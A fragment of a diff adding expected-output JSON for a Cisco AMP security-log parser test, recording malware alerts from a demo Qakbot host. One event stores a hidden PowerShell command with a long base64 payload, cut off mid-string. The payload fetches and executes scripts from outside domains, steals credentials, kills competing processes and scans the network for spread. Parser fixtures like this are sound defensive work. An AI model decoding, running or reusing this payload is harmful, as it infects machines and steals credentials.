"test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 713000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 31725, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "kepv86368.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 32926, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336646", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "uqlq0o884.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34182, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336645", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "120C.tmp", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 35438, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336644", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "2f99e3456dc1d26f77c52b2119fde92f", + "file.hash.sha1": "92673dd0e5f4a094fa6cd57bb301f884f2289f6c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 36775, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "2f99e3456dc1d26f77c52b2119fde92f", + "92673dd0e5f4a094fa6cd57bb301f884f2289f6c" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:14:44.000Z", + "cisco.amp.bp_data.audit": false, + "cisco.amp.bp_data.details.actions": [ + { + "action": "end_process", + "end_ts": 1602033881808, + "params": [ + "10724" + ], + "start_ts": 1602033881805, + "status": "success" + } + ], + "cisco.amp.bp_data.details.eng_epoch": 1, + "cisco.amp.bp_data.details.eng_ver": "0.9.0.104", + "cisco.amp.bp_data.details.matched_activity.events": [ + { + "process:start": { + "app": "powershell.exe", + "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "args": [ + "powershell.exe", + "-NoP", + "-NonI", + "-W", + "Hidden", + "-E", + "JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIAB